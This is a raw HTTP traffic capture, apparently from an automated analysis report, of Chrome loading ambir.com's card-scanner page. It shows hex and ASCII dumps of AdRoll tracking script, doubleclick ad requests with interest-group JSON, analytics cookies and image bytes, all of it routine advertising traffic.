                                                                                                                                                                                              2024-11-20 20:28:25 UTC1024INData Raw: 2e 63 68 61 72 41 74 28 6b 29 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 70 2c 6c 29 7c 7c 28 70 5b 6c 5d 3d 71 2e 64 69 63 74 53 69 7a 65 2b 2b 2c 68 5b 6c 5d 3d 21 30 29 2c 6d 3d 6e 2b 6c 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 70 2c 6d 29 3f 6e 3d 6d 3a 28 64 2e 5f 63 6f 6d 70 72 65 73 73 43 68 75 6e 6b 28 6e 2c 70 2c 68 2c 71 29 2c 70 5b 6d 5d 3d 71 2e 64 69 63 74 53 69 7a 65 2b 2b 2c 6e 3d 53 74 72 69 6e 67 28 6c 29 29 3b 22 22 21 3d 3d 6e 26 26 64 2e 5f 63 6f 6d 70 72 65 73 73 43 68 75 6e 6b 28 6e 2c 70 2c 68 2c 71 29 3b 66 6f 72 28 64 2e 5f 63 6f 6d 70 72 65 73 73 42 69 74 73 28 32 2c 71 2e 6e 75 6d 42 69
                                                                                                                                                                                              Data Ascii: .charAt(k),Object.prototype.hasOwnProperty.call(p,l)||(p[l]=q.dictSize++,h[l]=!0),m=n+l,Object.prototype.hasOwnProperty.call(p,m)?n=m:(d._compressChunk(n,p,h,q),p[m]=q.dictSize++,n=String(l));""!==n&&d._compressChunk(n,p,h,q);for(d._compressBits(2,q.numBi
                                                                                                                                                                                              2024-11-20 20:28:25 UTC16384INData Raw: 28 70 29 3b 3b 29 7b 69 66 28 66 2e 69 6e 64 65 78 3e 61 29 72 65 74 75 72 6e 22 22 3b 70 3d 64 2e 5f 64 65 63 6f 6d 70 72 65 73 73 42 69 74 73 28 4d 61 74 68 2e 70 6f 77 28 32 2c 66 2e 6e 75 6d 42 69 74 73 29 2c 66 29 3b 73 77 69 74 63 68 28 70 29 7b 63 61 73 65 20 30 3a 70 3d 64 2e 5f 64 65 63 6f 6d 70 72 65 73 73 42 69 74 73 28 4d 61 74 68 2e 70 6f 77 28 32 2c 38 29 2c 66 29 3b 6b 5b 66 2e 64 69 63 74 53 69 7a 65 2b 2b 5d 3d 62 28 70 29 3b 70 3d 66 2e 64 69 63 74 53 69 7a 65 2d 31 3b 66 2e 65 6e 6c 61 72 67 65 49 6e 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 70 3d 64 2e 5f 64 65 63 6f 6d 70 72 65 73 73 42 69 74 73 28 4d 61 74 68 2e 70 6f 77 28 32 2c 31 36 29 2c 66 29 3b 6b 5b 66 2e 64 69 63 74 53 69 7a 65 2b 2b 5d 3d 62 28 70 29 3b 70 3d 66 2e 64
                                                                                                                                                                                              Data Ascii: (p);;){if(f.index>a)return"";p=d._decompressBits(Math.pow(2,f.numBits),f);switch(p){case 0:p=d._decompressBits(Math.pow(2,8),f);k[f.dictSize++]=b(p);p=f.dictSize-1;f.enlargeIn--;break;case 1:p=d._decompressBits(Math.pow(2,16),f);k[f.dictSize++]=b(p);p=f.d
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1024INData Raw: 68 28 72 29 7b 7d 74 72 79 7b 76 61 72 20 6b 3d 63 2e 61 64 72 6f 6c 6c 5f 65 6d 61 69 6c 3b 69 66 28 21 74 68 69 73 2e 69 73 5f 6e 75 6c 6c 5f 6f 72 5f 62 6c 61 6e 6b 28 6b 29 29 7b 76 61 72 20 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2b 7c 5c 73 2b 24 2f 67 2c 22 22 29 2c 70 3d 6b 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 67 3d 64 3d 6e 75 6c 6c 3b 74 68 69 73 2e 69 73 5f 61 6c 72 65 61 64 79 5f 68 61 73 68 65 64 28 70 29 3f 65 2e 70 75 73 68 28 22 68 61 73 68 65 64 5f 65 6d 61 69 6c 3d 22 2b 70 29 3a 74 68 69 73 2e 69 73 5f 65 6d 61 69 6c 5f 76 61 6c 69 64 28 6b 29 3f 28 67 3d 74 68 69 73 2e 6d 64 35 28 70 29 2c 65 2e 70 75 73 68 28 22 68 61 73 68 65 64 5f 65 6d 61 69 6c 3d 22 2b 67 29 2c 64 3d 70 2e 73 70 6c 69 74 28 22 40 22 29 5b 31 5d 29
                                                                                                                                                                                              Data Ascii: h(r){}try{var k=c.adroll_email;if(!this.is_null_or_blank(k)){var k=k.replace(/^\s+|\s+$/g,""),p=k.toLowerCase(),g=d=null;this.is_already_hashed(p)?e.push("hashed_email="+p):this.is_email_valid(k)?(g=this.md5(p),e.push("hashed_email="+g),d=p.split("@")[1])
                                                                                                                                                                                              2024-11-20 20:28:25 UTC16384INData Raw: 68 28 72 29 7b 7d 74 72 79 7b 76 61 72 20 75 3d 0a 74 68 69 73 2e 65 78 74 65 72 6e 61 6c 5f 64 61 74 61 5f 74 6f 5f 71 73 28 63 2c 21 30 29 3b 75 26 26 65 2e 70 75 73 68 28 75 29 7d 63 61 74 63 68 28 72 29 7b 7d 21 74 68 69 73 2e 69 73 5f 75 6e 64 65 72 5f 65 78 70 65 72 69 6d 65 6e 74 28 22 6e 6f 66 6c 65 64 67 65 22 29 26 26 6e 61 76 69 67 61 74 6f 72 2e 6a 6f 69 6e 41 64 49 6e 74 65 72 65 73 74 47 72 6f 75 70 26 26 65 2e 70 75 73 68 28 22 78 61 34 3d 31 22 29 3b 65 2e 70 75 73 68 28 22 61 64 72 6f 6c 6c 5f 76 65 72 73 69 6f 6e 3d 22 2b 74 68 69 73 2e 67 65 74 5f 76 65 72 73 69 6f 6e 28 29 29 3b 74 68 69 73 2e 5f 76 31 5f 74 6f 5f 76 32 5f 73 68 69 6d 5f 75 6e 73 65 74 5f 67 6c 6f 62 61 6c 73 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 5f 62
                                                                                                                                                                                              Data Ascii: h(r){}try{var u=this.external_data_to_qs(c,!0);u&&e.push(u)}catch(r){}!this.is_under_experiment("nofledge")&&navigator.joinAdInterestGroup&&e.push("xa4=1");e.push("adroll_version="+this.get_version());this._v1_to_v2_shim_unset_globals();return this.get_b
                                                                                                                                                                                              2024-11-20 20:28:25 UTC16384INData Raw: 6d 22 21 3d 3d 64 2e 68 6f 73 74 26 26 22 69 70 76 34 2e 64 2e 61 64 72 6f 6c 6c 2e 63 6f 6d 22 21 3d 3d 64 2e 68 6f 73 74 26 26 22 64 2e 61 64 72 6f 6c 6c 2e 63 6f 6d 22 21 3d 3d 64 2e 68 6f 73 74 2b 22 3a 22 2b 64 2e 70 6f 72 74 26 26 22 69 70 76 34 2e 64 2e 61 64 72 6f 6c 6c 2e 63 6f 6d 22 21 3d 3d 64 2e 68 6f 73 74 2b 22 3a 22 2b 64 2e 70 6f 72 74 29 3f 61 3a 74 68 69 73 2e 61 64 64 5f 70 61 72 61 6d 5f 74 6f 5f 75 72 6c 28 61 2c 22 61 64 72 6f 6c 6c 5f 66 70 63 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 63 29 29 7d 3b 0a 5f 5f 61 64 72 6f 6c 6c 5f 5f 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 5f 63 6f 6e 73 65 6e 74 5f 74 6f 5f 75 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 20 61 3b 69 66 28
                                                                                                                                                                                              Data Ascii: m"!==d.host&&"ipv4.d.adroll.com"!==d.host&&"d.adroll.com"!==d.host+":"+d.port&&"ipv4.d.adroll.com"!==d.host+":"+d.port)?a:this.add_param_to_url(a,"adroll_fpc="+encodeURIComponent(c))};__adroll__.prototype.add_consent_to_url=function(a){if(!a)return a;if(


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              63192.168.2.549791172.217.17.664431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1005OUTGET /td/ga/rul?tid=G-5NGH3KRVGD&gacid=59994235.1732134501&gtm=45be4bj0v9180601725za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102077855~102081485&z=1373063728 HTTP/1.1
                                                                                                                                                                                              Host: td.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:24 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:24 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 20-Nov-2024 20:43:24 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:24 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                              Data Ascii: d<html></html>
                                                                                                                                                                                              2024-11-20 20:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              64192.168.2.549792172.217.17.664431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1391OUTGET /td/rul/1070729751?random=1732134501018&cv=11&fst=1732134501018&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config HTTP/1.1
                                                                                                                                                                                              Host: td.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:24 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:24 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Set-Cookie: test_cookie=CheckForPermission; expires=Wed, 20-Nov-2024 20:43:24 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:24 UTC605INData Raw: 31 36 34 30 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6f 72 69 67 69 6e 2d 74 72 69 61 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 41 76 68 35 4e 79 30 58 45 46 43 79 51 37 2b 6f 4e 69 65 58 73 6b 55 72 71 59 38 65 64 55 7a 4c 35 2f 58 72 77 4b 6c 47 6a 41 52 51 48 57 34 54 46 52 4b 2b 6a 56 64 35 48 6e 44 49 70 59 32 30 6e 35 4f 4c 48 66 67 55 34 6b 75 37 78 34 38 4e 33 75 68 47 2f 41 30 41 41 41 42 78 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 52 76 64 57 4a 73 5a 57 4e 73 61 57 4e 72 4c 6d 35 6c 64 44 6f 30 4e 44 4d 69 4c 43 4a 6d 5a 57 46 30 64 58 4a 6c 49 6a 6f 69 55 48 4a 70 64 6d 46 6a 65 56 4e 68 62 6d 52 69 62 33 68 42 5a 48 4e 42 55 45 6c 7a 49 69 77 69 5a 58 68 77
                                                                                                                                                                                              Data Ascii: 1640<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhw
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1390INData Raw: 64 61 74 65 3f 69 67 5f 6e 61 6d 65 3d 34 73 31 30 39 33 38 31 37 39 37 35 2e 31 37 33 32 31 33 34 35 30 31 5c 75 30 30 32 36 69 67 5f 6b 65 79 3d 31 73 4e 48 4d 78 4d 44 6b 7a 4f 44 45 33 4f 54 63 31 4c 6a 45 33 4d 7a 49 78 4d 7a 51 31 4d 44 45 21 32 73 5a 39 78 36 61 41 21 33 73 41 41 70 74 44 56 35 35 4b 6e 57 50 22 2c 22 74 72 75 73 74 65 64 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 62 74 73 22 2c 22 74 72 75 73 74 65 64 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73 4b 65 79 73 22 3a 5b 22 31 73 6d 50 78 6e 7a 77 21 32 73 5a 39 78 36 61 41 21 33 73 41 41 70 74 44 56 35 35 4b 6e 57 50 22 5d 2c 22 75 73 65 72 42 69 64 64 69 6e 67 53 69 67 6e 61 6c 73
                                                                                                                                                                                              Data Ascii: date?ig_name=4s1093817975.1732134501\u0026ig_key=1sNHMxMDkzODE3OTc1LjE3MzIxMzQ1MDE!2sZ9x6aA!3sAAptDV55KnWP","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1smPxnzw!2sZ9x6aA!3sAAptDV55KnWP"],"userBiddingSignals
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1390INData Raw: 30 32 31 39 34 36 39 22 2c 22 37 31 32 35 34 38 35 33 36 37 39 37 22 2c 6e 75 6c 6c 2c 22 32 31 36 37 39 33 31 31 30 34 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 36 31 37 37 35 37 30 32 37 22 5d 2c 22 61 64 52 65 6e 64 65 72 49 64 22 3a 22 68 35 6e 36 6e 31 44 71 48 59 77 22 2c 22 62 75 79 65 72 52 65 70 6f 72 74 69 6e 67 49 64 22 3a 22 31 6a 36 31 37 37 35 37 30 32 37 21 34 73 2a 32 41 22 7d 2c 7b 22 72 65 6e 64 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 73 66 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 61 64 66 65 74 63 68 2f 67 64 61 3f 61 64 67 5f 69 64 3d 31 36 36 37 30 30 32 31 39 34 36 39 5c 75 30 30 32 36 63 72 5f 69 64 3d 37 32 30 30 34 31 35 31 37 30 30 33 5c
                                                                                                                                                                                              Data Ascii: 0219469","712548536797",null,"21679311040",null,null,null,null,null,null,"617757027"],"adRenderId":"h5n6n1DqHYw","buyerReportingId":"1j617757027!4s*2A"},{"renderUrl":"https://tdsf.doubleclick.net/td/adfetch/gda?adg_id=166700219469\u0026cr_id=720041517003\
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1390INData Raw: 5f 69 64 3d 31 36 36 37 30 30 32 31 39 34 36 39 5c 75 30 30 32 36 63 72 5f 69 64 3d 37 31 32 35 34 38 35 33 36 37 39 37 5c 75 30 30 32 36 63 76 5f 69 64 3d 30 5c 75 30 30 32 36 66 6f 72 6d 61 74 3d 24 7b 41 44 5f 57 49 44 54 48 7d 78 24 7b 41 44 5f 48 45 49 47 48 54 7d 5c 75 30 30 32 36 72 64 73 3d 24 7b 52 45 4e 44 45 52 5f 44 41 54 41 7d 5c 75 30 30 32 36 73 65 61 74 3d 32 5c 75 30 30 32 36 72 70 5f 69 64 3d 72 31 6a 38 35 38 35 36 38 36 38 38 38 21 34 73 2a 32 41 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 22 31 36 36 37 30 30 32 31 39 34 36 39 22 2c 22 37 31 32 35 34 38 35 33 36 37 39 37 22 2c 6e 75 6c 6c 2c 22 32 31 36 37 39 33 31 31 30 34 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 38 35 38 35
                                                                                                                                                                                              Data Ascii: _id=166700219469\u0026cr_id=712548536797\u0026cv_id=0\u0026format=${AD_WIDTH}x${AD_HEIGHT}\u0026rds=${RENDER_DATA}\u0026seat=2\u0026rp_id=r1j8585686888!4s*2A","metadata":["166700219469","712548536797",null,"21679311040",null,null,null,null,null,null,"8585
                                                                                                                                                                                              2024-11-20 20:28:24 UTC929INData Raw: 39 33 31 31 30 34 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 38 35 38 35 36 38 35 33 31 36 22 5d 2c 22 61 64 52 65 6e 64 65 72 49 64 22 3a 22 7a 61 36 59 79 4e 6d 73 42 61 67 22 2c 22 62 75 79 65 72 52 65 70 6f 72 74 69 6e 67 49 64 22 3a 22 31 6a 38 35 38 35 36 38 35 33 31 36 21 34 73 2a 32 41 22 7d 5d 2c 22 65 78 65 63 75 74 69 6f 6e 4d 6f 64 65 22 3a 22 67 72 6f 75 70 2d 62 79 2d 6f 72 69 67 69 6e 22 2c 22 62 69 64 64 69 6e 67 57 61 73 6d 48 65 6c 70 65 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 74 64 2f 62 75 79 65 72 2e 77 61 73 6d 22 2c 22 70 72 69 6f 72 69 74 79 22 3a 35 39 36 34 38 2c 22 65 6e 61 62 6c 65 42 69 64 64 69 6e 67 53 69
                                                                                                                                                                                              Data Ascii: 9311040",null,null,null,null,null,null,"8585685316"],"adRenderId":"za6YyNmsBag","buyerReportingId":"1j8585685316!4s*2A"}],"executionMode":"group-by-origin","biddingWasmHelperUrl":"https://td.doubleclick.net/td/buyer.wasm","priority":59648,"enableBiddingSi
                                                                                                                                                                                              2024-11-20 20:28:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              65192.168.2.549795141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1904OUTGET /wp-content/uploads/2023/10/card-document-scanners_225h.jpg HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:25 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 16914
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=18292
                                                                                                                                                                                              ETag: "657cdd1d-4774"
                                                                                                                                                                                              Last-Modified: Fri, 15 Dec 2023 23:11:25 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13787
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb08ad04258-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:25 UTC891INData Raw: ff d8 ff e1 00 02 ff e1 00 02 ff db 00 84 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c2 00 11 08 00 e1 01 bb 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 02 01 0a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: "6
